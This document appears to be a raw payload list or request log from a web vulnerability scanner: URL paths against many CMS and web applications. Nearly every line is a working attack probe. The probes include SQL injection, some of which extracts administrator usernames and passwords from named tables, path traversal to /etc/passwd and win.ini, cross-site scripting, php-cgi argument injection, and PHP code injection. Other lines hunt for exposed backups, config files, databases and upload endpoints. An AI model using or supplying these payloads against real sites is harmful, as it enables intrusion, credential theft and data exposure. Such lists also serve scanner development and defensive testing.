/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/wp-admin
/
/admin.php
/dede/
/administrator/
/jsky_web_scanner_test_file.txt
/user
/nosec_Web_Scanner_Test.dll
/TRACE_test
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/TRACK_test
/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut/author.dll
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/_vti_bin/shtml.exe?_vti_rpc
/server-info
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/server-status
/jmx-console/
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/web-console/
/
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/webscan360noThisFile*~1*/.aspx
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/.../.../.../.../.../.../.../.../windows/win.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/phpMyAdmin/show_config_errors.php
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/xampp/index.php
/etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/?search=just_test_not_find_href
/$
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/solr/dev/admin/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/
/level/15/exec/-/show/running-config/CR
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/plugins/weathermap/weathermap-cacti-plugin.php
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/
/.../.../.../.../.../.../.../.../etc/passwd
/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/index
/icons/small/index
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/
/
/%3Cscript%3Ealert(42873).do
/
/%3Cscript%20s%3Ealert(42873)
/
/?%22onmouseover='prompt(42873)'bad=%22%3E
/
/%22%3E%3CsCrIpT%3Eprompt(42873)
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/
/'IHLD
/
/
/
/install.php
/
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/invoker/EJBInvokerServlet/
/extras/curltest.php?url=file://curltest.php
/invoker/JMXInvokerServlet/
/
/.svn/entries
/
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/
/
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/flow.php?step=login
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
